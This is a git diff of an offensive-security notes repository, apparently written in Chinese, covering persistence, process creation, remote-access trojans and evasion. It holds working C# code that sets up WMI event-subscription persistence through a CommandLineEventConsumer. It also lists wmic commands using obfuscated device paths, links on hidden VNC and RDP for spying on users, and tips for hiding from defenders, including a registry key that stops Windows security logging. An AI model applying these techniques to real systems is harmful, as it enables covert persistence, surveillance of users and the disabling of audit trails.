myEventFilter["Query"] = myEventQuery.QueryString; + myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage; + myEventFilter["EventNameSpace"] = @"\root\cimv2"; + myEventFilter.Put(); + myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance(); + myEventConsumer["Name"] = "BugSecConsumer"; + myEventConsumer["CommandLineTemplate"] = CommandLine; + myEventConsumer.Put(); + myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance(); + myBinder["Filter"] = myEventFilter.Path.RelativePath; + myBinder["Consumer"] = myEventConsumer.Path.RelativePath; + myBinder.Put(); + } + catch (Exception e) + { + Console.WriteLine(e); + } + Console.ReadKey(); + } + } +} +``` + +参考文章: + +{% embed url="https://github.com/AxelPotato/WMI" caption="" %} + +{% embed url="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi" caption="" %} + diff --git a/privilege-escalation/bug.md b/privilege-escalation/bug.md new file mode 100644 index 0000000..04f0e9e --- /dev/null +++ b/privilege-escalation/bug.md @@ -0,0 +1,2 @@ +# 漏洞 + diff --git a/privilege-escalation/untitled-4.md b/privilege-escalation/untitled-4.md new file mode 100644 index 0000000..6d82de4 --- /dev/null +++ b/privilege-escalation/untitled-4.md @@ -0,0 +1,2 @@ +# UAC Bypass + diff --git a/privilege-escalation/wrong-config.md b/privilege-escalation/wrong-config.md new file mode 100644 index 0000000..59a4bd6 --- /dev/null +++ b/privilege-escalation/wrong-config.md @@ -0,0 +1,2 @@ +# 错误配置 + diff --git a/process/creat-new-process.md b/process/creat-new-process.md new file mode 100644 index 0000000..3676bf2 --- /dev/null +++ b/process/creat-new-process.md @@ -0,0 +1,12 @@ +# 启动进程 + +WMI: + +```text +wmic process call create "\\?\UNC\127.0.0.1\C$\windows\system32\calc.exe" +wmic process call create "\\.\GLOBALROOT\??\UNC\127.0.0.1\C$\windows\system32\calc.exe" +wmic process call create "\\;lanmanredirector\127.0.0.1\C$\windows\system32\calc.exe" +wmic process call create "\\.\globalroot\osdataroot\windows\notepad.exe" +wmic process call create "\\.\global\globalroot\device\mup\;lanmanredirector\.\localhost\c$\\windows\:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data nul..\ /..\..\write.exe" +``` + diff --git a/rats/hidden-remote.md b/rats/hidden-remote.md new file mode 100644 index 0000000..1b8b6de --- /dev/null +++ b/rats/hidden-remote.md @@ -0,0 +1,14 @@ +# Hidden Remote + +HVNC: + +{% embed url="https://bbs.pediy.com/thread-264956.htm" caption="" %} + +HRDP: + +{% embed url="https://bbs.pediy.com/thread-265188.htm" caption="" %} + +Remote Desktop Shadowing: + +{% embed url="https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing" caption="" %} + diff --git a/rats/stealer/README.md b/rats/stealer/README.md new file mode 100644 index 0000000..2129374 --- /dev/null +++ b/rats/stealer/README.md @@ -0,0 +1,2 @@ +# Stealer + diff --git a/rats/stealer/shu-ru-fa.md b/rats/stealer/shu-ru-fa.md new file mode 100644 index 0000000..b4394e0 --- /dev/null +++ b/rats/stealer/shu-ru-fa.md @@ -0,0 +1,6 @@ +# 输入法 + +参考链接: + +{% embed url="https://www.cnki.com.cn/Article/CJFDTotal-JCJS202005014.htm" caption="" %} + diff --git a/tips/some-tips.md b/tips/some-tips.md new file mode 100644 index 0000000..93c1022 --- /dev/null +++ b/tips/some-tips.md @@ -0,0 +1,14 @@ +# 鬼知道有什么用的小知识 + +Win+Ctrl+Shift+B 重启图形驱动 + +ShellBrowserWindow创建的进程被any.run标记为用户手动执行 + +64位系统上的32位杀软有可能扫描不到c:\windows\sysnative下的文件 + +添加CurrentControlSet\Control\MiniNt,win会认为自己是pe系统,并不再记录安全日志 + +Win+R 输入”.exe://“ 会重启explorer + +echo qwqdanchun>C:\SYSTEM~1\ClientRecoveryPasswordRotation\test.txt\([https://twitter.com/jonasLyk/status/1368259706423230464?s=20](https://twitter.com/jonasLyk/status/1368259706423230464?s=20)\) + diff --git a/tools/untitled.md b/tools/untitled.md new file mode 100644 index 0000000..5094080 --- /dev/null +++ b/tools/untitled.md @@ -0,0 +1,2 @@ +# Untitled +